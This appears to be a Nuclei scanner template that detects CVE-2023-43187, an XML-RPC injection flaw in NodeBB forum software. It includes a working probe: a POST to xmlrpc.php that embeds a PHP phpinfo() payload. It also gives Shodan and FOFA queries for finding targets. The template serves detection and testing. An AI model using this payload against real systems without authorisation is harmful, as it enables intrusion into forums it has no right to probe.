id: CVE-2023-43187

info:
  name: NodeBB XML-RPC Request xmlrpc.php - XML Injection
  author: 0xParth
  severity: critical
  description: |
    A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.
  reference:
    - https://github.com/jagat-singh-chaudhary/CVE/blob/main/CVE-2023-43187
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43187
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43187
    cwe-id: CWE-91
    epss-score: 0.2535
    epss-percentile: 0.96685
    cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: nodebb
    product: nodebb
    shodan-query: cpe:"cpe:2.3:a:nodebb:nodebb"
    fofa-query: "title=\"nodebb\""
  tags: cve,cve2023,nodebb,rce
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains(to_lower(body), "nodebb")

  - method: POST
    path:
      - "{{BaseURL}}/xmlrpc.php"

    headers:
      Content-Type: "text/xml"

    body: |
      <?xml version="1.0"?>
      <methodCall>
        <methodName>system.listMethods</methodName>
        <params>
          <param>
            <value><?php phpinfo(); ?></value>
          </param>
        </params>
      </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>phpinfo()</title>"
          - "PHP Version"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402206f73e8bfe9f915a5f04e492f88298ddf9c08f2c4fba07b868c0fefcc55b5585e02205b4976d241ea3d57d596f3af37f9478a17a66b28bf536fe9d09ab098811bbb99:922c64590222798bb761d5b6d8e72950